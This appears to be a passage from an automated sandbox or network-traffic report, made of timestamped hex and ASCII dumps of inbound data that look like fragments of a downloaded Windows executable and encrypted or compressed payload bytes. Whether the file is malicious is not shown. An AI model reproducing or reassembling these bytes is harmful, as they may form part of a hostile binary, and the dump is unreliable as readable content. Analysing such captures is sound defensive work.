jSSuD(ET,AHttItl9]tg@MED8]tNL%tC9]t>@M}ED%u$L&t9]t@MED&SMQuP4@{M;p;MgMD};tM9u ]
2023-10-13 13:21:12 UTC	335	IN	Data Raw: 00 57 57 57 57 57 e8 1b 5c ff ff 83 c4 14 eb c9 8b c8 c1 f9 05 8d 1c 8d 20 4b fa 02 8b f0 83 e6 1f c1 e6 06 8b 0b 0f be 4c 31 04 83 e1 01 74 bf 50 e8 22 dd ff ff 59 89 7d fc 8b 03 f6 44 30 04 01 74 0e ff 75 08 e8 cb fe ff ff 59 89 45 e4 eb 0f e8 38 5c ff ff c7 00 09 00 00 00 83 4d e4 ff c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 86 75 ff ff c3 ff 75 08 e8 7b dd ff ff 59 c3 8b ff 55 8b ec 56 8b 75 08 56 e8 53 dc ff ff 59 83 f8 ff 75 10 e8 f5 5b ff ff c7 00 09 00 00 00 83 c8 ff eb 4d 57 ff 75 10 6a 00 ff 75 0c 50 ff 15 68 11 40 00 8b f8 83 ff ff 75 08 ff 15 5c 10 40 00 eb 02 33 c0 85 c0 74 0c 50 e8 e5 5b ff ff 59 83 c8 ff eb 1b 8b c6 c1 f8 05 8b 04 85 20 4b fa 02 83 e6 1f c1 e6 06 8d 44 30 04 80 20 fd 8b c7 5f 5e 5d c3 8b ff 55 8b ec 53 8b 5d 0c 56 8b Data Ascii: WWWWW\ KL1tP"Y}D0tuYE8\MEEuu{YUVuVSYu[MWujuPh@u\@3tP[Y KD0 _^]US]V
2023-10-13 13:21:12 UTC	372	IN	Data Raw: 05 4c ff ff 53 53 53 53 53 c7 00 16 00 00 00 e8 8d 4b ff ff 83 c4 14 33 c0 e9 4e 06 00 00 8b 55 10 89 55 ac 8a 02 3c 20 74 0c 3c 09 74 08 3c 0a 74 04 3c 0d 75 03 42 eb eb b3 30 8a 02 42 83 f9 0b 0f 87 2f 02 00 00 ff 24 8d 1c fb 40 00 8a c8 80 e9 31 80 f9 08 77 06 6a 03 59 4a eb dd 8b 4d 24 8b 09 8b 89 bc 00 00 00 8b 09 3a 01 75 05 6a 05 59 eb c7 0f be c0 83 e8 2b 74 1d 48 48 74 0d 83 e8 03 0f 85 8b 01 00 00 8b ce eb ae 6a 02 59 c7 45 8c 00 80 00 00 eb a2 83 65 8c 00 6a 02 59 eb 99 8a c8 80 e9 31 89 75 a8 80 f9 08 76 a9 8b 4d 24 8b 09 8b 89 bc 00 00 00 8b 09 3a 01 75 04 6a 04 eb ad 3c 2b 74 28 3c 2d 74 24 3a c3 74 b9 3c 43 0f 8e 3c 01 00 00 3c 45 7e 10 3c 63 0f 8e 30 01 00 00 3c 65 0f 8f 28 01 00 00 6a 06 eb 81 4a 6a 0b e9 79 ff ff ff 8a c8 80 e9 31 80 f9 Data Ascii: LSSSSSK3NUU< t<t<t<uB0B/$@1wjYJM$:ujY+tHHtjYEejY1uvM$:uj<+t(<-t$:t<C<<E~<c0<e(jJjy1
2023-10-13 13:21:12 UTC	376	IN	Data Raw: 00 23 ca 56 be 00 02 00 00 74 23 81 f9 00 01 00 00 74 16 3b ce 74 0b 3b ca 75 13 0d 00 0c 00 00 eb 0c 0d 00 08 00 00 eb 05 0d 00 04 00 00 8b cb 81 e1 00 00 03 00 74 0c 81 f9 00 00 01 00 75 06 0b c6 eb 02 0b c2 5e f7 c3 00 00 04 00 74 05 0d 00 10 00 00 c3 33 c0 f6 c2 10 74 05 b8 80 00 00 00 53 56 57 bb 00 02 00 00 f6 c2 08 74 02 0b c3 f6 c2 04 74 05 0d 00 04 00 00 f6 c2 02 74 05 0d 00 08 00 00 f6 c2 01 74 05 0d 00 10 00 00 bf 00 01 00 00 f7 c2 00 00 08 00 74 02 0b c7 8b ca be 00 03 00 00 23 ce 74 1f 3b cf 74 16 3b cb 74 0b 3b ce 75 13 0d 00 60 00 00 eb 0c 0d 00 40 00 00 eb 05 0d 00 20 00 00 b9 00 00 00 03 5f 23 d1 5e 5b 81 fa 00 00 00 01 74 16 81 fa 00 00 00 02 74 0a 3b d1 75 0f 0d 00 80 00 00 c3 83 c8 40 c3 0d 40 80 00 00 c3 8b ff 55 8b ec 83 ec 14 53 56 Data Ascii: #Vt#t;t;utu^t3tSVWttttt#t;t;t;u`@ _#^[tt;u@@USV
2023-10-13 13:21:12 UTC	380	IN	Data Raw: e2 ab cc d7 83 17 c2 6a 86 35 2d bd 16 b1 0b a2 20 e9 91 49 78 b6 df c0 0f 1a 3c 42 bf 65 c5 3a b2 71 fc fd 4a d4 4d 31 19 38 df a7 d4 2a 14 b4 04 db de 1a 3d 57 1d c1 61 7c 28 a6 c7 b3 96 ef fc cd ed a2 1e b2 5e 0b 45 80 60 af bb ec ce 43 49 b4 90 cf 7d 31 eb 45 a5 62 20 45 74 71 c2 56 0c d7 ac 2f 83 7c c5 2e ac 53 4d d3 3a bf fe 99 c5 93 e8 f4 7a 85 a2 4c 0b c3 88 29 28 03 61 2e 21 e6 6a d2 ed b4 cd bb 54 58 22 bd 25 71 e5 e1 77 4a 41 5a d7 c9 fd 74 a1 53 b9 ee c3 1f ef fc 98 b9 5c 3a 18 53 ed 6a cf ac 4f 39 df c5 1c 45 45 4f 03 2e 6c 72 dc a7 40 f4 cd 62 d3 20 ef dc a5 cf b4 68 15 e4 44 7c 02 7a 7e b4 f1 31 a5 f5 f9 84 41 25 06 a8 26 7d 87 16 73 60 fe 85 26 de d7 f3 e8 f4 7a 85 a2 4c 0b c3 94 d6 2b 4a 85 e0 f8 c2 ab 25 7e 30 01 fd c3 2b a7 ba 72 a4 11 Data Ascii: j5- Ix<Be:qJM18*=Wa\|(^E`CI}1Eb EtqV/\|.SM:zL)(a.!jTX"%qwJAZtS\:SjO9EEO.lr@b hD\|z~1A%&}s`&zL+J%~0+r
2023-10-13 13:21:12 UTC	384	IN	Data Raw: cb 3a 56 07 8a 5d 6e b6 05 52 99 07 f1 c3 80 a6 f5 2f cd 1e 82 05 bb 3c d3 ad 56 eb 3f 65 17 0e 55 d2 d8 ba 7f bc 82 13 7f fb 58 40 a0 e6 78 ad 6a d2 33 13 6a da bd 67 48 ca 01 4c 85 4b 33 3f d8 49 30 fd 6d 3f 6c d4 35 28 ab 38 c2 1a bb 6c 5b 93 30 94 84 a2 8d 10 ed 16 84 f2 2b 74 9f 5f 75 9e 79 8b a3 5d a8 46 3e b6 84 3d 50 04 a4 89 96 eb f0 53 da d7 bf 7a 6e 4b 19 22 26 67 28 0e 0d 78 ea cf 30 4b 23 dd f1 26 08 5b 0e 67 81 4e 40 04 2b 7b ca e7 8e fc 38 5c d3 89 f9 11 04 e5 0c ec 1e e8 80 eb f8 aa 2f f6 ae aa 51 84 70 62 c6 0e f2 6f 90 a0 d9 b4 10 2e 43 a6 8d cf 93 83 9f 5a fa 59 fc 07 ff 2c 2a c4 de 79 be 8e 83 4f a9 58 2d 93 19 3d ef 99 f8 75 ca ae e0 59 5b 51 eb 38 f6 8c 9f 6f 4a d9 14 f2 8a bc 99 04 e1 a6 32 87 e1 f8 e6 d2 cc f0 a4 22 4d 0f f7 7b 09 Data Ascii: :V]nR/<V?eUX@xj3jgHLK3?I0m?l5(8l[0+t_uy]F>=PSznK"&g(x0K#&[gN@+{8\/Qpbo.CZY,*yOX-=uY[Q8oJ2"M{
2023-10-13 13:21:12 UTC	388	IN	Data Raw: 0b 67 0a 30 7d 05 8d fa 7e 95 04 d9 1f 63 fe b0 e0 30 3e e3 a4 37 e6 6a c2 3f 17 2f bf e1 2a ed 9d e6 fe 37 de cb 0c a0 30 cf 93 a5 f9 80 26 37 49 a5 94 a4 82 92 3f 20 24 83 de b5 cc 9e 61 27 ea 60 c1 f6 7f 19 b7 ab 30 07 3d 50 cb c4 66 40 f6 d9 2c 21 87 31 dc 28 0d 01 51 42 1b 84 cc c6 6c 92 0d 7b 76 de 7b ad ab 33 95 c0 c8 af 3f 43 c6 cd 15 40 f7 7e d7 ec 6c 2a 18 08 0f cd ea 46 45 e8 21 a0 d3 f4 7b 22 2a 77 a7 2e e3 e7 6d d4 6a 10 69 a8 14 14 30 b4 93 5a a4 0d 88 a8 22 40 5e 4b 97 33 3d d2 c4 01 ab 32 d4 13 09 c5 d6 86 65 68 62 7a 59 56 3f 09 d5 76 8b 2e cb e2 b2 51 34 ac 5e 85 dd 25 cc 71 fa 68 3f 9f 5a ca 23 10 56 37 6e 96 e7 7f 8f bc bc a7 23 12 0b 7f ac 65 5d 0c 43 a5 8e 01 4a 84 31 c1 62 d8 b1 87 ce a6 29 8f ae c1 63 af 80 9d fb 84 75 b9 2b a6 fe Data Ascii: g0}~c0>7j?/70&7I? $a'`0=Pf@,!1(QBl{v{3?C@~lFE!{"*w.mji0Z"@^K3=2ehbzYV?v.Q4^%qh?Z#V7n#e]CJ1b)cu+
2023-10-13 13:21:12 UTC	392	IN	Data Raw: b2 da 3b 38 95 8a 54 bf 35 ba 24 4b 41 e1 b0 33 67 2c 37 b2 79 99 ce 62 d6 f6 6d 6d ec 9c 31 53 d9 ab 62 85 16 7a 14 75 18 53 ed 09 90 2e bf c6 56 ab 0f fa 97 a3 e6 5d f6 1f 93 06 58 f2 62 c3 06 66 ca 85 0e 1f e4 c7 d0 b4 14 54 4c c6 c7 86 44 72 ad 46 6b 7e f1 76 cf 0b db c5 73 5b be 1e d3 d5 5b 88 8c cb 27 f0 cd c3 58 5b 45 b8 21 b1 67 c0 74 80 ec 05 e6 93 bb a3 13 06 dd 1f 87 30 d0 a3 89 26 e8 78 c5 7f 3f 8d 23 ea cc e9 db 9a fe a6 1f f5 74 7d 93 9d ae 86 b2 c2 85 c0 01 9d bd a7 e4 4d 2a 29 ec 1f be c7 2c ed c2 95 a5 0d 0c 06 95 6c 87 fd d1 8c 20 45 fd 28 bd a4 4b ca 46 13 e4 ba 9b a3 56 a5 da 77 e4 db 9c 8b e4 85 86 4d 95 5a cf 0f 0c 53 1a dd 55 48 59 2a 4b 5c 65 79 84 8a 25 f5 82 98 da 8e d9 99 96 fb 29 b6 26 d2 cc da 1c 74 a4 1a 07 ff 38 d8 b6 8b 0a Data Ascii: ;8T5$KA3g,7ybmm1SbzuS.V]XbfTLDrFk~vs[['X[E!gt0&x?#t}M),l E(KFVwMZSUHYK\ey%)&t8
2023-10-13 13:21:12 UTC	396	IN	Data Raw: 57 7a ad 37 e8 5b bb 5b 67 66 c3 0b d7 86 83 ad 26 eb 23 62 b4 36 61 2c 05 cf 58 1f e7 6d 54 8b 5e d1 d0 83 9b b5 2d d9 1b 12 be b8 23 a1 52 ce b1 01 73 66 4a 17 3a 75 c1 9f ae 7f 69 59 bf ee f8 bf 1a 04 af e1 7d ac cb 5f 27 b2 0a 77 0f 1f e5 31 6f 86 f4 e2 d6 a2 a1 6d 58 00 52 66 0e f1 9b 4e 11 9b 2c 06 ec 5a 99 10 57 39 43 6d fa 5d eb 99 e3 9d 30 35 65 fe ca d1 58 c2 52 99 81 d8 33 a0 7b 16 0d 53 d6 fe d7 cc 5e 8f 16 f6 02 ad c2 a2 8b 59 b8 75 3e e4 19 f5 7f a7 cd e3 e3 0f f8 e1 a5 9c 97 80 a7 6a 2d d8 8e e3 f4 92 f0 da 39 d8 d5 b1 bb 8c d1 b0 27 ad 4f 28 11 4b 46 0d f5 1a 41 4c b2 e9 0a 40 f0 7b 2d 2e 56 92 9a b4 79 5a 0d 27 90 a2 23 51 90 a7 1b 1c 6e c6 35 62 e2 85 b0 e5 73 05 63 4b c2 1f 95 7c 85 0c 60 29 70 2d f3 80 3a 0f fd 57 b1 4c c0 42 5b db 3e Data Ascii: Wz7[[gf&#b6a,XmT^-#RsfJ:uiY}_'w1omXRfN,ZW9Cm]05eXR3{S^Yu>j-9'O(KFAL@{-.VyZ'#Qn5bscK\|`)p-:WLB[>
2023-10-13 13:21:12 UTC	400	IN	Data Raw: c3 9a f9 4a e6 2d d8 3e f3 42 3d a8 ed 8c 4c 12 c5 b7 7a 7f aa 0e 79 6c 80 c6 db bc df 2e dc e4 74 9c 6c 48 05 83 64 f0 b8 a0 5c 8b d6 82 7c 41 17 9b 93 68 40 95 d5 31 b3 0d 00 ac 84 4a b4 f6 46 df 07 35 08 af 96 6b 41 66 50 66 f6 b4 c0 60 25 81 2f 1d 4a f9 0e 61 61 ae d7 54 61 34 a9 e7 87 4f 83 ea c3 6e 2b c8 2a 25 ea ec 42 a1 92 3d d5 29 e5 df 0c 78 16 9e 61 ed 82 11 be 1f ed de 83 9e 8e 0a d4 bf 83 99 a3 4f 90 1f cf 00 1c cb a0 07 f4 3d 81 e0 6c 14 77 a5 63 2c c0 7c da 59 66 6f 27 d8 17 c3 ae 33 bf 37 5b eb 85 db c8 4f 87 8f 93 2c c6 47 f5 6d 71 f4 47 92 ba 27 a1 a0 06 5e 24 8b 64 35 d2 5a fb 15 64 e3 6f 4f 91 5f b1 1d 82 a5 1c a0 e9 3d 44 93 9b 75 6d 68 1c 4b 26 15 40 20 f8 a6 9c 7c eb 6e bc 2e c7 25 82 4d 89 f6 e5 a7 f7 c1 2c 93 66 64 b9 fd 1b c4 33 Data Ascii: J->B=Lzyl.tlHd\\|Ah@1JF5kAfPf`%/JaaTa4On+*%B=)xaO=lwc,\|Yfo'37[O,GmqG'^$d5ZdoO_=DumhK&@ \|n.%M,fd3
2023-10-13 13:21:12 UTC	404	IN	Data Raw: 1a 62 08 51 26 ab 32 97 03 21 de b1 af fc 16 87 1c 25 58 5f 2b 27 65 2c e0 27 79 71 bd b7 f9 30 ea 09 ab 6d a2 97 e8 a7 61 ca cf fd 7a 4f 67 d2 a9 2c 4c f7 cd 79 84 7e f4 7f 32 2f bf a9 65 ae 4e a8 88 1a 86 00 34 ff a8 10 09 4e 26 18 db 83 fc 1c e4 88 a6 af 73 47 ec f7 a9 7c 2b 8b dc d2 cb 47 28 39 96 39 9b 05 33 77 87 a8 6b 90 ed 08 ce 67 34 b1 ab bd a7 43 12 ed 70 66 89 3a 63 28 6f 75 62 51 cd a8 59 0e ad 70 fe 36 b7 64 95 9b 51 51 ec fa 23 0b 69 8d ad ab bb c4 fb f5 4d b8 30 c7 7e e1 5d 41 7f dc cb 70 28 32 8f 8c 3a af 58 58 e5 e4 c0 72 20 f1 5c 79 fb 3e 4f c8 67 33 4c 82 34 a2 ca 1c 55 af cc c8 c0 9b d8 15 d1 f4 c7 c5 e6 3e b5 74 7d 62 0f e8 80 df 66 1b 25 5a 4d aa f0 1b 23 d2 fd ac 06 f5 66 ea 9f fb 86 a1 83 33 b4 ec 70 73 ee f5 90 73 a3 79 c7 47 97 Data Ascii: bQ&2!%X_+'e,'yq0mazOg,Ly~2/eN4N&sG\|+G(993wkg4Cpf:c(oubQYp6dQQ#iM0~]Ap(2:XXr \y>Og3L4U>t}bf%ZM#f3pssyG
2023-10-13 13:21:12 UTC	408	IN	Data Raw: ac 74 48 eb 28 5e 9c 71 fa f8 e0 9b d8 53 38 91 f7 c2 a8 e5 f5 95 85 4f bc 94 a4 fc 31 e0 6f 91 29 13 a6 cf 77 95 40 ef 99 c9 a7 d1 60 5b 3c 25 ea 67 61 23 2f b8 ec 0b 77 37 6a b7 4f ff 58 11 92 11 c8 0f 13 b3 11 6d d4 36 7f 34 d8 01 53 e1 aa 56 9c bd 78 8d 4c 38 89 9f 05 d4 9e 30 c5 16 5d 04 4d 28 72 8c 68 cf a3 bc 75 19 0f 70 69 79 95 70 35 71 a6 e0 4d 99 88 e5 0f 54 de ca 38 ac 51 ce 84 6a 67 0f 84 18 ea e5 d4 12 af 0b ee 2a 38 ca 2d 3f 04 27 13 0f 77 0d 05 1c c6 78 45 99 4d 74 99 c4 1f 02 74 bc 91 58 dc 1e 4b 8e 75 f0 52 90 ae 68 a7 6a de c8 01 5c 38 86 2c 61 c3 61 20 28 ac 9e ea 11 51 ac cb 37 31 a0 24 c8 33 56 51 15 1a 8b 60 a8 59 45 25 42 47 f2 1d 31 72 d0 05 67 30 e9 77 38 86 53 59 50 05 62 bd f9 45 8a e4 40 8f 81 d0 49 f8 61 63 a3 b8 b4 ff 76 c4 Data Ascii: tH(^qS8O1o)w@`[<%ga#/w7jOXm64SVxL80]M(rhupiyp5qMT8Qjg*8-?'wxEMttXKuRhj\8,aa (Q71$3VQ`YE%BG1rg0w8SYPbE@Iacv
2023-10-13 13:21:12 UTC	412	IN	Data Raw: 3b e8 2e d7 21 6d 07 54 3e 1f ad 41 16 d7 0e c7 05 d2 b9 4a c2 49 ff 70 1d 5d 22 f3 99 73 02 76 ca 0a 05 3d 3a cf 9e 72 89 6b 6f 6e ec 9d c1 e5 95 35 66 01 5c 8f 77 a6 86 19 4b ac 70 1a b0 41 e4 fe c0 44 ca 01 2f a0 e6 bb f4 01 9e 9c 9a e8 42 0a 02 0d c4 21 b4 63 5f 4b 16 fe 47 6d 2e b2 00 0c 16 e4 4c 5a 8a 7f 05 e0 af d7 19 f5 eb 6d 95 8b aa 49 3f 0b ed 84 4f 1f 82 c8 26 41 41 8c a1 7f f1 87 09 62 7e df 73 dd 04 ce c6 df 89 5b c2 66 89 15 15 70 90 72 78 6d 2f df 87 11 f4 3e 64 a0 9b ce 45 8b db c2 b2 d0 c2 44 ad 7c 24 2d 9e e0 95 15 e7 9c 10 73 05 69 96 c1 ff 7b 40 02 b2 05 32 99 cc dc 23 f6 9e de 52 9e 3e a9 b8 bb e0 be 03 4b 71 9e 34 bc 21 c8 ad 51 ad 6a e4 9e 1b 77 b0 e5 43 b5 5a da b3 71 0b d7 93 b8 cd 13 e5 e8 88 dc ee b8 00 d5 08 77 f2 31 ac 03 89 Data Ascii: ;.!mT>AJIp]"sv=:rkon5f\wKpAD/B!c_KGm.LZmI?O&AAb~s[fprxm/>dED\|$-si{@2#R>Kq4!QjwCZqw1
2023-10-13 13:21:12 UTC	416	IN	Data Raw: e5 2d 5c 3f e8 d7 0d 39 53 ed d5 51 c3 d2 94 d6 6e c8 5b e8 1a 7a 7d 98 c4 14 38 b9 55 55 68 c1 4d 56 29 bb 19 79 eb 38 59 a5 93 43 64 33 f8 17 b7 28 a5 b2 72 da c6 5d 14 b6 1c 54 08 da 00 c5 f1 15 22 ec c2 c2 ad f2 40 4e 9b fc d4 7c cd 95 35 01 a6 81 e2 7c d9 04 4f 87 5d 89 f5 22 f8 d1 b8 6f b7 74 73 3c ed 22 2b 12 68 10 98 17 44 85 4a c6 da b1 55 db b2 fd 6a 9d 16 95 3f 48 19 f4 b9 96 54 91 8c 45 42 9f 26 70 9b a1 31 07 82 c3 34 79 ec 1c 0c 68 95 98 8c 6a d5 00 5c 2d f3 38 fe 68 20 1b ba aa 89 12 bb eb 1d 57 40 15 f2 a9 5e 42 f7 2e e1 0d af 1c c0 2d 6c 33 d1 48 44 f0 5c 05 e4 65 ed 48 70 f4 1d 00 83 61 a5 79 e6 26 24 76 ac 2f 66 ea 01 a2 f1 96 bc f8 36 73 a5 4a a5 c7 d2 ee 4e 56 bd 57 87 3d b4 73 ef 52 17 48 d4 e8 2f 3f 52 a5 1f 78 0e c2 99 27 25 45 31 Data Ascii: -\?9SQn[z}8UUhMV)y8YCd3(r]T"@N\|5\|O]"ots<"+hDJUj?HTEB&p14yhj\-8h W@^B.-l3HD\eHpay&$v/f6sJNVW=sRH/?Rx'%E1
2023-10-13 13:21:12 UTC	420	IN	Data Raw: 60 f6 33 4f 0d e4 42 24 c4 07 47 2c e3 71 e5 87 90 51 4c 26 f2 b4 45 85 3b c6 af 7e 75 86 ee 25 b2 9d 15 64 74 d4 fc 4e ad b4 e6 9a f7 56 b2 0f a7 b0 de 83 3e 7e 71 f9 d0 c0 10 20 2e eb 9f 83 62 4e 4d 5c c1 8b 4e 78 59 f9 9e e6 83 8a 74 fe e1 1b f7 e3 1b 01 2e 1e 1c 65 ad 3f ca 16 f6 d2 2d 84 25 a2 dd 9c d2 dc bd f1 b3 ab e1 ad 5c 26 e3 78 27 de f0 a9 71 e2 cc 60 c3 68 69 71 c2 40 04 01 97 eb 73 ed 8e a0 bc 05 13 ad d0 0c a0 20 fa 95 b2 d6 93 d9 14 8d 4f 0d 9b 29 8a 26 ca 5c 27 a2 2f d4 7d de d9 a3 59 1a 51 15 d1 32 1d a9 50 53 1b ca d3 f6 04 8b e5 85 55 fe 39 b8 ee 5a 45 bb 41 35 5b 2c 5d d0 b5 d9 83 38 c6 22 a2 d7 04 76 40 5b 35 d9 8d d1 fc 55 38 5e 50 3c c9 1e b7 67 89 3a 3e c7 1d 25 c4 b2 c6 ed bf 78 d9 02 93 a3 23 32 be 51 ff aa c6 d3 dc 29 6e 10 ef Data Ascii: `3OB$G,qQL&E;~u%dtNV>~q .bNM\NxYt.e?-%\&x'q`hiq@s O)&\'/}YQ2PSU9ZEA5[,]8"v@[5U8^P<g:>%x#2Q)n
2023-10-13 13:21:12 UTC	424	IN	Data Raw: 34 ef cf 6e 18 90 bb 52 ad 23 3c 42 bd e2 6a c8 c2 25 c4 ac f8 c0 01 5b 24 07 e8 94 a8 f1 4d 91 24 9a b4 19 48 9f b1 01 f6 57 7b fe 7b a9 22 5d 75 d6 56 32 36 0c 42 eb 76 8f 3e f5 b4 c7 f1 31 45 f7 ad 82 56 4c 9b 81 5d 91 ad 9e 08 8c 2d b0 ab 80 36 e5 53 74 46 cc 9b 4e 49 6b 2d 7d d2 19 39 5a 52 2e 68 20 77 19 bf c6 43 d6 96 3d db e7 fc 34 23 99 35 46 d5 8f 3f 75 42 70 e0 5b bd b8 20 7d e4 bd 75 79 b2 3c 60 13 5a cc ce 19 34 39 a2 d7 6e 5d 74 35 c1 03 c7 26 1b 74 26 79 12 93 29 91 c9 93 24 9c 49 19 83 55 a5 ef 34 e5 d7 42 37 70 3c 20 2a 99 31 f4 d7 14 54 27 e1 7e 88 b9 41 ff db 96 82 5f 9e db 92 0e 2d 90 1b b3 bc e5 e0 3e 64 74 92 bd 75 cd bb fb 60 6a d2 cc 81 d8 8e e7 c8 72 cd ca 24 7a ca 3e 0f a8 4b 60 3d 3c 60 cd 79 9a f3 38 3a 77 4b c0 6f 83 dd cf 12 Data Ascii: 4nR#<Bj%[$M$HW{{"]uV26Bv>1EVL]-6StFNIk-}9ZR.h wC=4#5F?uBp[ }uy<`Z49n]t5&t&y)$IU4B7p< *1T'~A_->dtu`jr$z>K`=<`y8:wKo
2023-10-13 13:21:12 UTC	428	IN	Data Raw: 01 2e 8d c6 e2 07 04 83 80 4a e6 fa df 8c 52 ad af af 42 8c ef 4c 5d 10 6e 4b 4a 1d b7 44 da b8 d1 fb 86 cb cd 86 8f 63 95 2f 14 a8 a5 d6 ed b2 b9 0f 06 c4 f1 35 0b 8b c3 05 a8 7a 92 2e e9 21 c2 e5 af 21 49 ec 9c ce 0f be 75 9c ad d1 1f fc 0d 21 df 58 97 1a e6 bf 64 59 ff 6b 7d ad b9 c0 9d 5b a8 fa 13 2f 95 89 e7 d3 6e 94 02 e1 72 d8 ed 3b 2d 71 67 49 92 66 63 ac 86 9f 5a 2d 5e 55 56 5a 01 f1 87 7f 2c 13 10 be ae 9c 16 81 46 35 b4 4a 65 f1 3b 4a 43 cc 9c d2 33 b1 0c ac 21 a6 00 6c 32 52 6e 15 7b 60 e3 c2 ec a7 5d e0 4f 7b 21 52 7e d8 c8 e1 77 7f 8a 2f 12 04 b5 78 a2 a0 41 d5 70 9d f7 f4 5c 4c 14 1c 5c 5c 60 78 af 8b b2 2e d9 30 d4 e8 50 14 59 1a dd 00 c1 34 a2 0f ab 87 5f a0 96 e3 62 90 e7 82 fd 88 a3 13 a7 27 f8 3a 57 88 f1 cc 6b d0 de d1 7c 6b 5c 6a 07 Data Ascii: .JRBL]nKJDc/5z.!!Iu!XdYk}[/nr;-qgIfcZ-^UVZ,F5Je;JC3!l2Rn{`]O{!R~w/xAp\L\\`x.0PY4_b':Wk\|k\j
2023-10-13 13:21:12 UTC	432	IN	Data Raw: 6c 48 c4 7d 88 6d 79 89 8b 12 98 12 16 21 1e 3f 07 1d 11 34 2b 5e b3 60 3e a6 4d 65 8c 4c a2 49 ee a4 30 25 52 8f e4 9c 41 10 70 68 75 7f d6 08 f9 79 99 29 8b 82 3d c4 0c ff 47 e0 17 61 0e d0 c3 c3 dd 7d 65 1c 74 38 f7 9c 3a 66 40 b1 76 f5 38 cd 2a 52 4e aa f0 d7 db 7d f1 d7 b0 3b ae 25 a9 cf 15 2c d0 bd a8 9b a9 75 16 54 77 66 96 ac d6 97 04 f7 b9 15 46 16 ac 5f a5 10 e4 ce e6 88 a7 f7 18 4e 84 18 91 26 62 93 53 e1 7c 5f 2d eb 73 4a e7 fb 40 ae 18 34 59 63 86 61 71 ce 34 55 e5 c6 8a c6 e0 78 cf 22 bd 9f 24 0f 6b ff 82 c6 3a a3 6c 2b 62 d7 89 b8 82 ab 0b 8e 1f d5 43 51 06 b8 7e d5 0b ab 8f 45 92 1d 3a 94 a8 ce 1a 0f 4c 6c 77 4b 16 da fe 4c c7 2b 16 c2 0c f0 28 e8 f0 44 6b 14 6f d6 81 32 66 8e b3 b5 41 2d 7a d9 bd e5 16 24 c3 b6 2c e8 86 3e 83 97 02 36 a3 Data Ascii: lH}my!?4+^`>MeLI0%RAphuy)=Ga}et8:f@v8*RN};%,uTwfF_N&bS\|_-sJ@4Ycaq4Ux"$k:l+bCQ~E:LlwKL+(Dko2fA-z$,>6
2023-10-13 13:21:12 UTC	436	IN	Data Raw: d9 ee 20 bf fb d7 86 f6 86 79 63 d6 09 ce 08 b4 9f be 5b 39 3c 07 aa 99 a2 24 6b 65 1f 0a 7d 1f d9 68 05 09 22 05 f3 73 1c c8 8c c0 b6 bb 45 dd 76 be 54 06 79 53 58 94 75 07 df f6 1e 83 ca cc b5 d0 bc c0 b9 e0 e3 28 fb 78 a0 07 16 3c 59 7a 5d ab 6d a0 f1 11 3f a0 09 f4 9c 02 9b 31 d0 5c b6 c5 4e 64 92 92 48 a0 1d 1f 2c 79 9d 21 ec 7f 2a ad 0e da f7 a1 59 81 97 5d 58 f1 b5 b1 38 05 25 26 f9 8c a2 d3 b0 3a d6 6e 4e 54 8f c6 0c c5 12 ec 59 22 aa d7 7d 59 2b e4 1a 46 25 3a 24 82 f0 25 b1 79 7d 87 3d c7 1c c5 39 e2 28 9a ca ae c7 1d a0 7f 20 8f c6 de c9 52 57 69 ef 3e 92 2a c0 7d 2e 11 1c 15 fa 19 96 b6 54 e7 6c 79 04 f8 bf 92 44 8a 18 02 a4 b8 e7 bc a7 ab 9f eb 47 4a 63 f7 00 50 17 03 7a e4 1e ae 03 5a 65 12 25 69 e7 52 55 c7 d1 fc 17 b5 93 8a f2 cd a4 36 ec Data Ascii: yc[9<$ke}h"sEvTySXu(x<Yz]m?1\NdH,y!Y]X8%&:nNTY"}Y+F%:$%y}=9( RWi>}.TlyDGJcPzZe%iRU6
2023-10-13 13:21:12 UTC	440	IN	Data Raw: f2 d6 4f b3 51 1e 10 7e 57 39 d6 86 b0 2f d0 bf ab f9 cc 8a ff 51 bf d8 f2 83 6b c7 f4 2a 6c a3 f1 c2 e4 25 6e f7 b8 85 4d 6c 02 05 cb c1 bf 04 1b 76 24 da fb 2c 76 93 47 42 a8 8c 2c e8 24 91 f7 0c f8 9b 39 88 4d 26 f9 53 58 87 0b 47 8a 8c a9 e7 e3 88 07 3a 57 4c f5 d9 31 d2 2e 81 71 a4 94 3c 2d da 01 92 b0 60 05 62 ee f3 56 59 20 db 38 18 d6 9f 0e 57 c8 6e 12 1a e1 93 f7 50 cc d0 08 25 fd f4 27 ff 96 cd d8 a6 53 b4 35 88 51 a0 c3 b3 12 b3 b8 06 22 53 ca da 93 72 6d df 30 66 69 63 2a 19 78 c6 f7 a6 ba 21 aa 84 00 c7 e1 5f c5 19 51 4c 97 9c e9 39 be 12 04 54 81 63 01 02 4b 2f bf f0 7f 1c 25 f9 a6 21 a5 b9 d1 05 96 a3 ba d4 c0 58 70 8c 4e 0e 54 c2 82 a0 58 57 39 fa 0d 8d 96 0e ce 22 a0 94 47 66 08 ff 86 4f 38 ae f4 53 e6 f6 d3 85 a9 47 82 fa 1e 0d c2 75 7a Data Ascii: OQ~W9/Qkl%nMlv$,vGB,$9M&SXG:WL1.q<-`bVY 8WnP%'S5Q"Srm0ficx!_QL9TcK/%!XpNTXW9"GfO8SGuz
2023-10-13 13:21:12 UTC	444	IN	Data Raw: c9 61 42 44 f2 46 8d 66 de c2 02 7d 3a 9f e9 16 ee 50 70 b9 46 3d e8 a8 0d 14 72 99 7e 75 e9 01 b2 70 b2 d1 43 31 39 88 c2 14 50 a8 63 dd 7a cc 97 74 56 e7 85 75 e5 82 c9 e8 a9 e2 a6 ce 96 45 82 d1 f8 e2 2a c2 b4 34 08 e4 01 95 7c e6 8a 05 36 1a e4 c7 dd 6a 67 3c 4c ea a7 ae e4 6f fc 5a 40 fe a2 bc 71 9d 8a 29 85 91 f4 0e 7e 05 b1 23 4d 18 51 a2 e7 f0 c5 d5 c4 f7 13 5b f7 f9 ae a5 12 0c 31 65 a9 3e a2 16 9f 37 45 22 62 41 94 99 44 c8 55 1b 0f 4c 0b 20 eb 66 a3 2b 9e 3e b1 5b 77 f2 4b 57 bd a1 7a 4f e2 e8 5b 86 cc af 14 ba 44 49 6d ae 39 60 3e af 49 72 b1 f7 1a 43 c3 cc 2a 1a 9c 68 c6 2a 25 f1 ec 20 09 0d 7e 98 74 dc a7 43 48 0c fc 91 61 78 57 f7 7d a3 32 36 30 25 8b 71 54 37 14 8e 65 a4 dc 82 66 28 c9 a0 e0 0a 59 77 65 f2 8c 7b 3a c8 1b 54 07 35 3b 4a f1 Data Ascii: aBDFf}:PpF=r~upC19PcztVuE4\|6jg<LoZ@q)~#MQ[1e>7E"bADUL 